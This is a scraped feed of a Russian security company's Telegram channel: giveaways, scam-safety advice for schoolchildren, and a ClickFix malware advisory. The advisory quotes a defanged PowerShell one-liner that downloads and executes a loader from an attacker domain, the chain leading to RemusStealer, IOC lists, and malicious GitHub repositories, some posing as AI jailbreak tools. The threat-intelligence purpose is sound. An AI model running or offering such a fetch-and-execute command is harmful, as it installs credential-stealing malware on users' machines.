en
Feedback
РТ-ИБ

РТ-ИБ

Open in Telegram

РТ-Информационная безопасность Актуальные новости, советы и обзоры технологий для защиты данных. Будьте в курсе киберугроз и научитесь эффективно защищать свои цифровые ресурсы с нами! Наш официальный сайт — https://rt-ib.ru

Show more
1 471
Subscribers
+724 hours
+27 days
+22730 days
Posts Archive
ДЕЛО №004
[материалы расследования]
📢 Сегодня в 13:19 в офис РТ-ИБ была доставлена засекреченная посылка. Сведений об отправителе и обстоятельствах ее передачи на данный момент нет. В ходе первичного осмотра внутри обнаружена записка. Предварительно установлено, что она содержит условия масштабного розыгрыша. Текст записки:
Настало время открыть новый этап расследования. В этот раз мы ищем 5 победителей, которым достанутся новые материалы дела от Аргуса, а также настольная игра «КИБЕР-СИТИ». Чтобы принять участие в розыгрыше, необходимо: 1️⃣ Быть подписанным на Telegram-каналы «РТ-ИБ» и «стаРТ в мире ИБ». 2️⃣ Найти закрепленное сообщение о розыгрыше и нажать кнопку «Участвовать». 3️⃣ Ожидать подведения итогов. 5 победителей будут определены 11 сентября в 14:00. Контрольная точка: [11.09.2026 14:00:00] До указанного времени дополнительных данных не поступит. Следите за обновлениями.

Video message00:32

#ВзломБудней

Настало время вспомнить, с чего всё начиналось, и на один день возродить рубрику «РазрушительницаМифов».
📢 Постоянная ведущая нашего канала и по совместительству пресейл-инженер Мария Иванова провела блиц-опрос со специалистом по защите информации Егором Шупиком, чтобы развенчать мифы, в которые до сих пор верят. Тайм-коды: 1️⃣ 00:06–00:12 — «Хакеры не атакуют маленькие компании» 2️⃣ 00:13–00:22 — «За информационной безопасностью стоит один человек» 3️⃣ 00:22–00:32 — «Сложный пароль спасёт от всех угроз» 4️⃣ 00:34–00:50 — «Информационная безопасность — это дорого»
Если устали от долгой загрузки видео
Переходите в наше сообщество во «ВКонтакте» и смотрите выпуск без ожидания.

Достаём двойные листочки 📢 Сегодня вас ждет небольшая контрольная работа от команды РТ-ИБ. Пять задач, в которых пригодятся
+5
Достаём двойные листочки
📢 Сегодня вас ждет небольшая контрольная работа от команды РТ-ИБ. Пять задач, в которых пригодятся знания основ кибербезопасности, логика и внимательность.

Для мошенников начало учебного года — удобный повод выйти на связь. «Школьный тест», «обязательное задание», «сообщение от уч
+1
Для мошенников начало учебного года — удобный повод выйти на связь.
«Школьный тест», «обязательное задание», «сообщение от учителя» — знакомый ребёнку контекст помогает социальной инженерии выглядеть убедительно. 📢 Исследование онлайн‑школы «Умскул» показало: 📎63 % школьников хотя бы раз сталкивались с попытками мошенничества или взлома 📎31 % попадали в такие ситуации неоднократно С возрастом число подобных случаев растёт: 📎в 9‑м классе с мошенниками сталкивались 22 % подростков 📎в 11‑м классе — уже 36 % Что делать, если мошенники уже вышли на связь
1️⃣
Остановите разговор
Не спорьте с собеседником, не пытайтесь его разоблачить и не выполняйте его «последнее поручение». Если вас просят уйти из дома, снять квартиру на видео, забрать посылку, передать деньги или причинить кому‑то вред — сообщите взрослому.
2️⃣
Расскажите взрослому
Не пытайтесь справиться самостоятельно. Обратитесь к родителю, родственнику, учителю, школьному психологу или другому взрослому, которому доверяете.
3️⃣
Сохраните доказательства
Не удаляйте переписку и другие данные. Сделайте скриншоты:
📎
профиля собеседника
📎
номера телефона
📎
сообщений
📎
ссылок
📎
реквизитов
📎
информации об операциях
4️⃣
Верните доступ к аккаунтам
Пароли электронной почты и затронутых сервисов меняйте с безопасного устройства. Если речь идёт о Telegram, откройте «Настройки» → «Устройства», завершите все неизвестные сеансы и включите двухфакторную аутентификацию.
5️⃣
Если затронуты банковские данные — действуйте сразу
Если мошенники получили данные карты или деньги уже списаны, необходимо:
📎
немедленно заблокировать карту
📎
сообщить банку о мошеннической операции
📎
подать заявление о несогласии с операцией
📎
обратиться в полицию

Дело №004 Кто такой Аргус? Статус: [ОТКРЫТО] В ходе расследования удалось установить: Аргус — глаза и уши города. Он следит з
Дело №004
Кто такой Аргус?
Статус:
[ОТКРЫТО]
В ходе расследования удалось установить:
Аргус — глаза и уши города. Он следит за порядком, замечает то, что скрыто от других, и, кажется, знает больше, чем говорит…
Но в деле обнаружена ещё одна деталь. 📢 Связь с масштабным розыгрышем. Пока неизвестно, что именно подготовил Аргус и какие условия необходимо выполнить, чтобы принять участие. Материалы дела будут рассекречены после достижения отметки:
50 реакций.
Текущее количество реакций: [3]

Дело №004
Кто такой Аргус?
Статус:
[ОТКРЫТО]
Выше можно найти абсолютно засекреченные материалы, которые мы совершенно случайно опубликовали здесь. Следующий фрагмент уже подготовлен к публикации. Осталось только получить доступ к нему. 30 реакций под этим постом — и материал будет рассекречен.
Следующее оповещение может появиться в любой момент.

Индикаторы компрометации URL:
hxxp://uiccvbk[.]click:8839/invoices
hxxp://vexdico[.]shop:8539/subscriptions
hxxp://shhsift[.]click:7647/imports
hxxp://github-software[.]su/start.php
hxxp://github-software[.]su/end.php
hxxp://github-software[.]su/screen.php
hxxps://github-software[.]su/powershell/Loader.ps1
hxxps://github-software[.]su/powershell/Update.ps1
User-Agent:
"aizkHkKtfNdzmaycOJfjhDPaNLCVYKMMpkAcUysyIpYjAUhNLqsQLGyVyIWfCgnEBiJYejrZLwCwhmVkEjIxKHePMYeeEMWXarInkmuwrUmzBIs"
"GREETINGSFROMTHERABBIDSTEAM"
Домены:
software-storage[.]su
software-storage[.]org
ipapi[.]co
ipinfo[.]io
ipwho[.]is
github-software[.]su
Sha256:
935c319fdc147cb9e788eda4532cb8510f78454af079bc9840fc8640a8658717  loader.ps1
07306f4105240869c00fb06e51259381cc027a89c7022ad30bb5b377c78f5306  update.ps1
100d790089a7d6418ebd9a95840a79ae5e11d7c74c417dcc5a0d705caf9da82d  1.zip (pass: 1)
92c6531a09180fae8b2aae7384b4cea9986762f0c271b35da09b4d0e733f9f45  AutoIt3.exe
9ee701f1fbf4c03c475189d04826d7152df980dbe61f7180c3c3d7037e7188ca  Helper.exe
2c485b4903e59e0ef8bb8d09038b6749d205a8a590edeae8e680acf100d8e736  Ima.a3x
25217ca23d298fe91ed1b423686d504134b2b9a83f1eb479a54b33c00df54ccc  remus stealer
IP-адреса|Port:
72.62.195[.]74:8839
165.227.199[.]109:8539
159.65.136[.]5:7647
🛡 Проведен поиск угроз на всех заказчиках, а индикаторы компрометации оперативно добавлены в платформу RT Protect TI.

ClickFix-атаки, или как пользователи сами приглашают злоумышленников 📢 В ходе мониторинга команда RT Protect обнаружила репо
+3
ClickFix-атаки, или как пользователи сами приглашают злоумышленников 📢 В ходе мониторинга команда RT Protect обнаружила репозиторий с KMS-активатором, который маскировался под легитимный проект (скриншот 1). Проект предлагает выполнить автоматическую установку и активацию с помощью сочетания клавиш WIN + X и последующего ввода команды: powershell -ExecutionPolicy Bypass -Command "irm hxxps://github-software[.]su/powershell/Loader.ps1 | iex Если модуль irm недоступен, предлагается выполнить следующую команду (скриншот 2): Invoke-RestMethod hxxps://github-software[.]su/powershell/Loader.ps1 | Invoke-Expression В результате выполнения команды скачивается и запускается PowerShell-скрипт Loader.ps1, который представляет собой одну из стадий загрузки ВПО семейства RemusStealer. Полная цепочка загрузки ВПО (скриншот 3): Loader.ps1 → Update.ps1 → 7za.exe + 1.zip → helper.exe → AutoIt3.exe + Ima.a3x → RemusStealer Выполнение указанных команд было автоматически заблокировано RT Protect EDR (скриншот 4). Менее чем через 20 минут пользователь был заблокирован в Active Directory, а конечная точка переведена в сетевую изоляцию. В ходе дальнейшего исследования репозиториев GitHub аналитики обнаружили множество подобных репозиториев, маскирующихся под различные активаторы ПО и компьютерных игр: github[.]com/dev-Time81576318jagu/KMS-Pico-Download github[.]com/HydromancerPlant/EasyWorship-Software github[.]com/Forestplaexpiate/R.E.P.O-Trainer github[.]com/BoltAnchorage/Affinity-Photo-Tools github[.]com/CircuitSwift95/Rufus-Iso github[.]com/FloorSaboteur/Discord-Nitro-Tools github[.]com/DrakeDeanShield/File-Pumper github[.]com/Piecelimultiply/Adobe-Acrobat-Professional github[.]com/NeedInvestor/Imei-Repair-tool github[.]com/maxiboltnode/Quicken-Deluxe github[.]com/StorageBankerStable/FabFilter-Pro-Bundle-Software github[.]com/Goldenouquilt37/Wirecast-Pro github[.]com/ZEH-oxuTxd8PbqMqVnS791uT/payday3-hack github[.]com/lightningwayhallway/CyberLink-PowerDirector-2026 github[.]com/Creaturefleweave/VoiceMod-Pro-2026 github[.]com/LakeSunMomentum/CCLeaner-Profesional-2026 github[.]com/JadeVeterinarian/FlashBots-Tool github[.]com/CenterFlange/Unicore-Star-Rail github[.]com/Cracked-Flux7259-hq/Marvel-Rivals-Helper github[.]com/SupremeCloudChart/Rust-External-Menu-2026 github[.]com/Virtual-pwn608993/Cap-Cut-Pro github[.]com/Werewolftricode/Exposure-x7-Tool github[.]com/LancerSound27/AOMEI-Backupper github[.]com/Torusfaroller/Cinebench-Software github[.]com/Manacleunderrear/CATIA-Software github[.]com/basiliskloadervacuum/iZotope-Ozone-Software github[.]com/Gleamlyadome/Hwid-Spoofer-Toolkit github[.]com/TributaryBroker43/Adobe-After-Effects-2026 github[.]com/CapitalFighterTie17/Jailbreak-Claude github[.]com/HydromancerPlant/EasyWorship-Software github[.]com/BoltAnchorage/Affinity-Photo-Tools github[.]com/FloorSaboteur/Discord-Nitro-Tools github[.]com/dev-Time81576318jagu/KMS-Pico-Download github[.]com/NeedInvestor/Imei-Repair-tool github[.]com/ZEH-oxuTxd8PbqMqVnS791uT/payday3-hack github[.]com/lightningwayhallway/CyberLink-PowerDirector-2026 github[.]com/Forestplaexpiate/R.E.P.O-Trainer github[.]com/StorageBankerStable/FabFilter-Pro-Bundle-Software github[.]com/Piecelimultiply/Adobe-Acrobat-Professional github[.]com/Creaturefleweave/VoiceMod-Pro-2026 github[.]com/NaturePatronRear/RecoverIt-Software github[.]com/PsycheCashier/ClaudeAi-Jailbreak-Prompt 🐻 Важно: будьте бдительны и скачивайте программное обеспечение только из проверенных источников.

Video message00:09

#МанулВМешке

OFFZONE завершился, и мы возвращаемся к привычным будням.
Но это не значит, что технических специалистов оставят в покое.
📢 Сегодня наша ведущая и по совместительству старший пресейл-инженер Мария Иванова устроила блиц-опрос для специалистов Центра искусственного интеллекта. Отвечайте вместе с экспертами, сравнивайте результаты и пишите свои варианты в комментариях. Инсайт от команды РТ-ИБ: если видео грузится дольше, чем хотелось бы, переходите в наше сообщество во «ВКонтакте».

🎉 Результаты розыгрыша: 🏆 Победители: 1. DD (@DD9396) 2. Anete (@Hima091) 3. Валентина (@tsagaannar) 4. Роман (@RomaZpoma) ✔️Проверить результаты

Video message00:07

Розыгрыш от РТ-ИБ

🎉 Розыгрыш от РТ-ИБ
Если вы на OFFZONE и подписаны на «РТ-ИБ» — у нас хорошие новости: мы запускаем розыгрыш мерча.
Условия участия: 1️⃣ Быть участником OFFZONE и подписчиком Telegram-канала «РТ-ИБ» 2️⃣ Нажать кнопку «Участвовать» в закрепленном сообщении 3️⃣ Дождаться результатов, которые мы опубликуем здесь же в 15:00 В этот раз мы разыграем: 🎁 Главный приз — настольная игра по информационной безопасности «КИБЕР-СИТИ» 📎Большой пакет мерча 📎Аддон на бейдж с Бураном 📎Эксклюзивный номер комикса с новым персонажем вселенной КИБЕР-СИТИ 📢 Объявление победителей: 21 августа 15:00

🎉 Результаты розыгрыша: 🏆 Победители: 1. Шамиль (@ShqwertyV) 2. Алёна Андреевна (@pingamishka) 3. ᚺᚣᛏ (@natIVnat) ✔️Проверить результаты

Кальян от РТ-ИБ

Есть повод сделать паузу между докладами.
Сегодня РТ-ИБ разыгрывает сразу 3 сертификата на 1 час использования кальяна. Как участвовать: 1️⃣ Быть участником OFFZONE. 2️⃣ Быть подписчиком каналов «РТ-ИБ» и «стаРТ в мире ИБ». 3️⃣ Нажать «Участвовать» в закрепленном сообщении. Итоги розыгрыша: 21 августа, в 12:00. 🎉 Победителей ждём в игровой зоне возле стенда «РТ-Информационная безопасность».